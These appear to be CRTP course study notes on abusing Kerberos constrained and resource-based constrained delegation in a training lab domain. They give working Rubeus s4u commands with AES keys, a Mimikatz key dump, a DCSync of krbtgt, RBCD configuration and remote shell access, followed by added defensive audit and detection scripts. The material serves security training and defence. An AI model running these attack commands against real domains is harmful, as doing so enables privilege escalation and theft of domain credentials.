Certified Red Team Professional (CRTP) - Notes
Constrained Delegation

Constrained delegation allows a service to impersonate a user, but only to specific services on specific computers as defined in its configuration.

Example Scenario

  1. A user (e.g., Joe) authenticates to a web application using a method that does not support Kerberos.

  2. The web application, running under the websvc account, requests a TGS for Joe using S4U2Self.

  3. The KDC verifies the TRUSTED_TO_AUTH_FOR_DELEGATION flag on the websvc account and that Joe is not restricted from delegation.

  4. If allowed, it returns a forwardable TGS for Joe.

  5. The web service now uses S4U2Proxy to request access to a service like CIFS/dcorp-mssql.dollarcorp.moneycorp.local.

  6. The KDC checks if this SPN is listed in msDS-AllowedToDelegateTo for websvc. If yes, it returns the TGS.

  7. The web service uses the TGS to access the target service as Joe.

Constrained Delegation with Protocol Transition

If an attacker gains access to the websvc account, they can impersonate any user to access any service listed in msDS-AllowedToDelegateTo.

Enumeration

To find accounts with constrained delegation enabled:

  • PowerView:

    Get-DomainUser -TrustedToAuth
    Get-DomainComputer -TrustedToAuth
  • ActiveDirectory module:

    Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

Abuse via Rubeus

Request TGT and TGS in one step using Rubeus:

Rubeus.exe s4u /user:websvc `
/aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 `
/impersonateuser:Administrator `
/msdsspn:CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL /ptt

Then access:

dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$

Note: The SPN in the TGS is in clear-text, making it possible to target sensitive services even when delegation was configured for seemingly low-risk systems.

Alternate scenario (with /altservice parameter):

Rubeus.exe s4u /user:dcorp-adminsrv$ `
/aes256:db7bd8e34fada016eb0e292816040a1bf4eeb25cd3843e041d0278d30dc1b445 `
/impersonateuser:Administrator `
/msdsspn:time/dcorp-dc.dollarcorp.moneycorp.LOCAL `
/altservice:ldap /ptt

Then, with the LDAP service ticket for dcorp-dc injected, run DCSync:

C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt"
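A defender-side counterpart to the enumeration above, added here and not part of the course material: it lists every account configured for constrained delegation, flags protocol transition, collapses the allowed SPNs to hosts (because of the /altservice issue noted above), and checks that Domain Admins are protected from S4U impersonation. It assumes the RSAT ActiveDirectory module and the default English group names.

```powershell
# Added audit example (not part of the course material). Assumes the RSAT
# ActiveDirectory module and read access to the domain; group names are defaults.
Import-Module ActiveDirectory

$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # userAccountControl: "Use any authentication protocol"
$NOT_DELEGATED                  = 0x100000   # userAccountControl: "Account is sensitive and cannot be delegated"

# Every user or computer with msDS-AllowedToDelegateTo populated
# (same population as Get-DomainUser/-Computer -TrustedToAuth)
$delegators = Get-ADObject -LDAPFilter '(msDS-AllowedToDelegateTo=*)' `
    -Properties msDS-AllowedToDelegateTo, userAccountControl

$report = foreach ($obj in $delegators) {
    $protocolTransition = ([int]$obj.userAccountControl -band $TRUSTED_TO_AUTH_FOR_DELEGATION) -ne 0
    # The service class in a ticket is not protected (see the /altservice note above), so a
    # delegation to any SPN on a host is effectively a delegation to every service on it.
    $hosts = @($obj.'msDS-AllowedToDelegateTo') |
        ForEach-Object { ($_ -split '/')[1] -replace ':\d+$', '' } | Sort-Object -Unique
    [pscustomobject]@{
        Account            = $obj.Name
        ObjectClass        = $obj.ObjectClass
        ProtocolTransition = $protocolTransition   # $true = can impersonate any non-protected user without their ticket
        ReachableHosts     = ($hosts -join ', ')
    }
}
$report | Sort-Object ProtocolTransition -Descending | Format-Table -AutoSize

# Mitigation check: privileged users should be marked sensitive or sit in Protected Users,
# otherwise S4U2Self will issue tickets in their name.
$protectedUsersDN = (Get-ADGroup -Identity 'Protected Users').DistinguishedName
Get-ADGroupMember -Identity 'Domain Admins' -Recursive |
    Where-Object objectClass -eq 'user' |
    Get-ADUser -Properties userAccountControl, memberOf |
    ForEach-Object {
        $sensitive   = ([int]$_.userAccountControl -band $NOT_DELEGATED) -ne 0
        $inProtected = $_.memberOf -contains $protectedUsersDN
        if (-not ($sensitive -or $inProtected)) {
            Write-Warning "$($_.SamAccountName) is delegatable: set 'Account is sensitive' or add it to Protected Users"
        }
    }
```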

Labs

Learning Object 16 lab

Resource-Based Constrained Delegation (RBCD)

RBCD shifts delegation control from the front-end service (e.g., web server) to the target resource (e.g., database server). This is managed through the msDS-AllowedToActOnBehalfOfOtherIdentity attribute, visible as PrincipalsAllowedToDelegateToAccount, which is stored on the resource. Unlike standard delegation types, SeEnableDelegation rights are not required. Any object with write permissions on the resource can configure RBCD.

To exploit RBCD effectively, you need:

  1. Write permissions over the target resource.

  2. Control over an object with an SPN, such as:

    • Local admin access to a domain-joined machine.

    • Ability to join a machine to the domain (default ms-DS-MachineAccountQuota = 10 for all users).


Enumeration and Exploitation

Identify write permissions with:

Find-InterestingDomainACL | ? { $_.IdentityReferenceName -match 'ciadmin' }

Set RBCD using the ActiveDirectory module:

$comps = 'dcorp-student1$','dcorp-student2$'
Set-ADComputer -Identity dcorp-mgmt -PrincipalsAllowedToDelegateToAccount $comps

Extract AES keys for the impersonating machine:

Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

Use the AES key with Rubeus to impersonate:

Rubeus.exe s4u /user:dcorp-student1$ `
/aes256:d1027fbaf7faad598aaeff08989387592c0d8e0201ba453d83b9e6b7fc7897c2 `
/msdsspn:http/dcorp-mgmt `
/impersonateuser:administrator /ptt

Then access the machine:

winrs -r:dcorp-mgmt cmd.exe
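The defensive view of the RBCD procedure above, added here and not part of the course material: an inventory of resources that accept delegated identities, the ACEs that would let someone set the attribute on a given resource, the MachineAccountQuota check, and the DC-side event that records the change. It assumes the RSAT ActiveDirectory module, that dcorp-mgmt is the resource under review, and that Directory Service Changes auditing is enabled on the domain controllers.

```powershell
# Added defensive example (not part of the course material). Assumes the RSAT
# ActiveDirectory module, that 'dcorp-mgmt' is the resource under review, and that
# Directory Service Changes auditing is enabled on the domain controllers.
Import-Module ActiveDirectory
$resource = 'dcorp-mgmt'

# 1. Inventory: which computers accept delegated identities, and from whom
Get-ADComputer -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
    -Properties PrincipalsAllowedToDelegateToAccount |
    Select-Object Name, @{ n = 'Principals'; e = { $_.PrincipalsAllowedToDelegateToAccount -join ', ' } } |
    Format-Table -AutoSize

# 2. Who can write the attribute on the resource: any Allow ACE granting a write right on the
#    computer object is enough to add a foreign SPN-bearing principal to it.
$dn = (Get-ADComputer -Identity $resource).DistinguishedName
(Get-Acl -Path "AD:\$dn").Access |
    Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.ActiveDirectoryRights -match 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty'
    } |
    Select-Object IdentityReference, ActiveDirectoryRights, IsInherited | Format-Table -AutoSize

# 3. MachineAccountQuota > 0 lets any user create a machine account (an SPN-bearing principal)
$domainDN = (Get-ADDomain).DistinguishedName
$quota = (Get-ADObject -Identity $domainDN -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
if ($quota -gt 0) {
    Write-Warning "ms-DS-MachineAccountQuota is $quota; set it to 0 and delegate computer joins explicitly"
}

# 4. Detection on a DC: event 5136 records every modification of the attribute, including who made it
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 5136 } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'msDS-AllowedToActOnBehalfOfOtherIdentity' } |
    Select-Object TimeCreated,
        @{ n = 'Actor';  e = { if ($_.Message -match 'Account Name:\s+(\S+)') { $Matches[1] } } },
        @{ n = 'Object'; e = { if ($_.Message -match 'DN:\s+(\S+)') { $Matches[1] } } }
```

Run section 4 on a domain controller (or against forwarded DC logs); the other sections work from any domain-joined host with the module installed.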

Labs

Learning Object 17 lab
